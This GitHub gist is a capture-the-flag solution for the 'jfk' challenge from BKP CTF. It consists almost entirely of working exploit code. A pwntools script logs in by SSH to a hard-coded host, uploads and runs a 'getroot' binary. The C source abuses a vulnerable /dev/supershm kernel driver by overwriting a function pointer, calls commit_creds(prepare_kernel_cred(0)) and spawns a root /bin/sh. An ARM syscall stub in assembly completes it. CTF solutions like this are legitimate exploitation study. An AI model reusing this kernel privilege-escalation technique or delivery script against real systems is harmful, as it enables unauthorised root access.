Created
March 1, 2015 20:01
-
-
Save kokjo/34dda66ba6c24cb24804 to your computer and use it in GitHub Desktop.
Solution for jfk from bkpctf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| s = ssh("jfk", "54.152.92.112", password="jfk") | |
| r = s.shell(tty=False) | |
| r.recvuntil("\x00/ $ ") | |
| log.info("VM has booted") | |
| r.sendline("cd /home/supershm") | |
| r.recvuntil("~ $ ") | |
| log.info("Uploading getroot binary") | |
| r.sendline("base64 -d << EOF > /home/supershm/getroot") | |
| for line in open("getroot.b64", "r"): | |
| print ".", | |
| r.sendline(line) | |
| r.recvuntil(">") | |
| r.sendline("EOF") | |
| r.recvuntil("~ $ ") | |
| log.info("Uploading: Done!") | |
| r.sendline("chmod +x getroot") | |
| r.recvuntil("~ $ ") | |
| r.sendline("./getroot") | |
| r.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // compile with: | |
| // arm-linux-gnueabi-gcc-4.7 getroot.c syscall.s -o getroot -static -nostdlib | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| #define _GNU_SOURCE /* See feature_test_macros(7) */ | |
| #include <unistd.h> | |
| #include <sys/syscall.h> /* For SYS_xxx definitions */ | |
| #include <stdint.h> | |
| void (*commit_creds)(void *) = 0xc00384b4; | |
| void *(*prepare_kernel_cred)(void *) = 0xc00387f4; | |
| void *on_read_ptr1 = 0xbf410acc; | |
| void *on_read_ptr2 = 0xbf000acc; | |
| int has_run = 0; | |
| void shellcode(){ | |
| has_run = 0x41414141; | |
| commit_creds(prepare_kernel_cred(0)); | |
| } | |
| struct foobar { | |
| char cmd; | |
| char name1[32]; | |
| void *ptr; | |
| uint32_t valid; | |
| char name2[1]; | |
| } __attribute__ ((__packed__)); | |
| int _start(int argc, char **argv){ | |
| struct foobar exploit; | |
| int i; | |
| for(i=0; i<sizeof(exploit.name1);i++) | |
| exploit.name1[i] = 'A'; | |
| exploit.cmd = 'c'; | |
| exploit.ptr = on_read_ptr1; | |
| exploit.valid = 0x41414141; | |
| exploit.name2[0] = 'C'; | |
| int fd = syscall(SYS_open, "/dev/supershm", O_RDWR); | |
| syscall(SYS_write, fd, &exploit, sizeof(exploit)); | |
| exploit.cmd = 'd'; | |
| syscall(SYS_write, fd, &exploit, sizeof(exploit)); | |
| exploit.cmd = 'c'; | |
| exploit.ptr = on_read_ptr2; | |
| syscall(SYS_write, fd, &exploit, sizeof(exploit)); | |
| syscall(SYS_write, fd, "uC", 2); | |
| void *shellcode_ptr[128]; | |
| for(i =0; i < 128; i++) shellcode_ptr[i] = shellcode; | |
| syscall(SYS_write, fd, &shellcode_ptr, sizeof(shellcode_ptr)); | |
| // trigger! | |
| syscall(SYS_close, fd); | |
| if(has_run == 0x41414141){ | |
| syscall(SYS_write, 1, "SUCCESS!", 8); | |
| char *binsh[] = {"/bin/sh", NULL}; | |
| syscall(SYS_setuid, 0); | |
| syscall(SYS_execve, binsh[0], binsh, NULL); | |
| syscall(SYS_exit, 0); | |
| } | |
| else | |
| { | |
| syscall(SYS_write, 1, "FAILED!!", 8); | |
| syscall(SYS_exit, 1); | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text | |
| .global syscall | |
| syscall: | |
| mov ip, sp | |
| stmfd sp!, {r4, r5, r6, r7, lr} | |
| mov r7, r0 | |
| mov r0, r1 | |
| mov r1, r2 | |
| mov r2, r3 | |
| ldmfd ip, {r3, r4, r5, r6} | |
| swi 0x0 | |
| ldmfd sp!, {r4, r5, r6, r7, pc} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment